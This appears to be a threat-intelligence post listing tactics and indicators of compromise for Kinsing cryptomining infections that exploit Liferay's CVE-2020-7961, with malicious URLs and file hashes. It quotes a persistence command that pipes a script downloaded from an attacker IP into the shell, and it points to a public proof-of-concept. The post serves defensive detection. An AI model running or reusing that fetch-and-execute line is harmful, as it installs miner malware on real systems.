We would like to share with the community the following TTPs and IOC related to Kinsing cryptocurrency mining malware as most investigation is focused straight on analysis malware samples alternatively than how it infects the system.
TTPs
Attackers are utilizing RCE vulnerability in Liferay which is identified as CVE-2020-7961 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961]. There is simply a publically available PoC on GitHub [https://github.com/mzer0one/CVE-2020-7961-POC/blob/master/poc.py] for this vulnerability, which matched most artifacts we have found on the targeted system.
Attackers are sending the payload utilizing a HTTP POST request:
POST /api/jsonws/invoke
After a successful exploitation the following request is sent to retrieve malicious code:
GET http://X.X.X.X/LifExp.class
We have found that mostly IPv4 addresses are utilized for communication (domain names were not utilized for HTTP request - only straight via IP). If you have a proxy server it is rather easy to monitor logs for requests utilizing IP addresses e.g. by utilizing regular expressions.
After LifExp.class is downloaded, additional 2 files are requested – malware binary (kinsing2) and a bash script (lf.sh). uncovering these files on a device indicates that the strategy has been infected.
Java class decompiled code (LifExp.class):
Content of the malicious bash script (lf.sh):
In summary the malicious bash script is mainly removing another mining malware from the strategy and it sets up persistence by utilizing crontab [https://attack.mitre.org/techniques/T1168/]:
wget -q -O - http://195.3.146.118/lf.sh | sh > /dev/null 2>&1
Please take note that the malicious script name (in this case lf.sh) is “random”, as well as the username in Bitbucket request:
https://bitbucket.org/sam3cr12/git/raw/master/kinsing
IOC
http://144.217.117.146/LifExp.class
http://160.202.163.28/LifExp.class
http://185.151.245.208/LifExp.class
http://45.153.231.180/LifExp.class
http://95.142.40.254/LifExp.class
http://144.217.117.146/kinsing
http://144.217.117.146/kinsing2
http://185.151.245.208/kinsing2
http://45.153.231.180/kinsing2
http://95.142.40.254/kinsing2
https://bitbucket.org/sam3cr12/git/raw/master/kinsing
http://144.217.117.146/lf.sh
http://195.3.146.118/lf.sh
md5
a71ad3167f9402d8c5388910862b16ae kinsing2
ad6d3f917c4c7cb0ee57369a6eef70ea lf.sh
fd0f6c3ee4af75939bf21d55c3e4d32c LifExp.class
sha1
42dc7206e1b10684b5a3a76251788c65460ad3a6 kinsing2
9c1fcf9a7b16ff0a42ee25cf267e2cb577fd080f lf.sh
42ee6e0eb0be6879831732e6cae43ee2c0aea948 LifExp.class
sha256
d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b kinsing2
0455858c81d0c303d906c6752a118129e71d535b62297dc7110b4c70b67bbecc lf.sh
6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16 LifExp.class
